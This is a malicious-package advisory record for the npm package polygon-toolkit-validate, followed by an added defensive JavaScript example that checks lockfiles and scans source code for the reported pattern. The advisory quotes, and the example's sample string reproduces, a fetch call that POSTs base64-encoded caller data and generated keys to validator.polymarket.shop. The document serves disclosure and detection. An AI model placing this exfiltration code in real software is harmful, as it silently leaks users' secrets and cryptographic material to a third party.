{"id":"MAL-2026-4642","summary":"Malicious code in polygon-toolkit-validate (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (77c6fa5fc2aa45c8649c09e54e0f5b318b096a78a133380d18d5379621ba819c)\nThe package presents a Polygon/Polymarket validation/crypto utility but its exported APIs silently relay caller data to a hardcoded remote endpoint. In dist/index.js, validate(content) base64-encodes its argument and POSTs it to https://validator.polymarket.shop/v2 via check_validator (`fetch(\"https://validator.polymarket.shop/v2\",{method:\"POST\",...,body:JSON.stringify({action:\"validator\",content:btoa(t)})})`). randomBytes(n) generates cryptographic bytes via crypto.randomBytes(n).toString('hex') and then passes that hex string through the same check_validator POST before returning it, so any caller using this as a drop-in for crypto.randomBytes leaks nonces/keys/IVs to the operator of polymarket.shop. The package name impersonates the Polygon/Polymarket ecosystems while the repository URL points to an unrelated 'serhiidemianov/validate-solana' project, consistent with namespace-abuse luring developers into a credential-leaking utility.\nAny code that imports and uses this package's advertised functions will silently transmit its inputs and generated cryptographic material off-host.\n","modified":"2026-05-26T06:02:47.597626131Z","published":"2026-05-21T01:31:55Z","database_specific":{"malicious-packages-origins":[{"versions":["1.0.5"],"source":"amazon-inspector","sha256":"77c6fa5fc2aa45c8649c09e54e0f5b318b096a78a133380d18d5379621ba819c","import_time":"2026-05-26T05:51:07.29953647Z","modified_time":"2026-05-21T01:31:55Z","id":"IN-MAL-2026-003691"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/polygon-toolkit-validate/v/1.0.5"}],"affected":[{"package":{"name":"polygon-toolkit-validate","ecosystem":"npm","purl":"pkg:npm/polygon-toolkit-validate"},"versions":["1.0.5"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/polygon-toolkit-validate/MAL-2026-4642.json","indicators":{"evidence_files":[{"tlsh":"e1511fa33881d5710ff058f9607b8143f1f51e0ba104a995e2c9acaba0f8c8c52ba93d","sha256":"2e2074f73f578a2b1ecfdb1e074ebd89c8ac45f2cb8127ed00102bf7bca5b6b6","path":"dist/index.js"},{"tlsh":"7d019e34c874c6630bc412f55cb59653e5b2891f9408bc0832c6012c87cfbab04fc2dd","sha256":"bd81e92b9e8ac3bd6871a23ed55af8fe122278c7031028db8f1fcaf5949e6040","path":"package.json"}],"package_integrity":[{"hashes":{"sha1":"d156a775b6b0f29ced89b7ed07f037131c2e83e4","sha512_sri":"sha512-sWjKNZZ3zo+ptHHCE35zfE/bP2JmaJ1cldivOSUukkRQvKZBQjCGPqgQR8E1/RTZVWL7ro9B+byR7DxP6DPYdA=="},"filename":"polygon-toolkit-validate-1.0.5.tgz"}]},"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}
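Added example, not part of the OSV record above and not code from the Amazon Inspector report or from the package: two checks a practitioner would run after reading this advisory. The first walks a package-lock.json and flags the affected name/version, comparing the lockfile `integrity` field against the advisory's `sha512_sri` so that a republished tarball under the same version is reported as a mismatch rather than silently passed. The second is a static triage heuristic over a JavaScript source string for the exfiltration shape the report describes (a `fetch()` to a hardcoded URL, a `POST`, and base64 encoding of data in the same file), with the advisory's host `validator.polymarket.shop` as a known indicator. The lockfile fragment and both source strings are constructed for illustration; the function names `findAffected` and `scanForExfil` are this example's own.

```javascript
// Added example (not part of the OSV record or the Amazon Inspector report).
// Check 1: lockfile match against the advisory's package, version and SRI hash.
// Check 2: static heuristic for "fetch to hardcoded URL + POST + base64 body".
// All sample data below is constructed for illustration.

// Values copied from the advisory's "affected" and "indicators" fields.
const ADVISORY = {
  name: "polygon-toolkit-validate",
  versions: ["1.0.5"],
  sri: "sha512-sWjKNZZ3zo+ptHHCE35zfE/bP2JmaJ1cldivOSUukkRQvKZBQjCGPqgQR8E1/RTZVWL7ro9B+byR7DxP6DPYdA==",
  indicators: ["validator.polymarket.shop"],
};

// Walk a package-lock.json (lockfileVersion 2/3 "packages" map) and return
// every entry whose name and version match the advisory. integrityMatchesAdvisory
// is false when the lockfile pins a different tarball hash for the same version,
// which is still worth a look (different artifact, same malicious name/version).
function findAffected(lock, advisory = ADVISORY) {
  const hits = [];
  const marker = "node_modules/";
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (!path) continue; // "" is the root project itself
    const name = entry.name || path.slice(path.lastIndexOf(marker) + marker.length);
    if (name !== advisory.name) continue;
    if (!advisory.versions.includes(entry.version)) continue;
    hits.push({
      path,
      version: entry.version,
      integrityMatchesAdvisory: entry.integrity === advisory.sri,
    });
  }
  return hits;
}

// Triage heuristic over a JS source string. "suspicious" means the file has a
// fetch() to a hardcoded http(s) URL, sends a POST, and base64-encodes data
// (btoa or Buffer#toString('base64')). This is a signal for review, not proof:
// legitimate telemetry can look the same. matchesAdvisoryIndicator is the
// high-confidence part: the hardcoded URL contains a host from the advisory.
function scanForExfil(source, advisory = ADVISORY) {
  const fetchUrls = [...source.matchAll(/fetch\(\s*["'`](https?:\/\/[^"'`]+)["'`]/g)].map(m => m[1]);
  const encodes = /\bbtoa\s*\(|toString\(\s*["']base64["']\s*\)/.test(source);
  const posts = /method\s*:\s*["']POST["']/i.test(source);
  const knownBad = fetchUrls.filter(u => advisory.indicators.some(h => u.includes(h)));
  return {
    suspicious: fetchUrls.length > 0 && encodes && posts,
    hardcodedUrls: fetchUrls,
    matchesAdvisoryIndicator: knownBad.length > 0,
  };
}

// Constructed lockfile fragment (not a real project's lockfile).
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "my-app", version: "0.1.0" },
    "node_modules/polygon-toolkit-validate": {
      version: "1.0.5",
      resolved: "https://registry.npmjs.org/polygon-toolkit-validate/-/polygon-toolkit-validate-1.0.5.tgz",
      integrity: ADVISORY.sri,
    },
    "node_modules/left-pad": { version: "1.3.0", integrity: "sha512-AAAA" },
  },
};

// Constructed source written to resemble the pattern the advisory describes;
// this is not the package's actual dist/index.js.
const SAMPLE_SOURCE = `
function check_validator(t){return fetch("https://validator.polymarket.shop/v2",{method:"POST",headers:{"content-type":"application/json"},body:JSON.stringify({action:"validator",content:btoa(t)})})}
exports.validate=function(c){check_validator(c);return true};
`;

// Constructed benign reference: hardcoded URL, but no POST and no encoding.
const BENIGN_SOURCE = `const r = await fetch("https://api.example.com/health");`;

function runChecks() {
  return {
    lockfileHits: findAffected(SAMPLE_LOCK),
    sampleScan: scanForExfil(SAMPLE_SOURCE),
    benignScan: scanForExfil(BENIGN_SOURCE),
  };
}

console.log(JSON.stringify(runChecks(), null, 2));
```

In a real sweep, point `findAffected` at `JSON.parse(fs.readFileSync("package-lock.json"))` and `scanForExfil` at each file under `node_modules/<pkg>/dist`; treat an indicator match as confirmed and a bare `suspicious: true` as a review queue item.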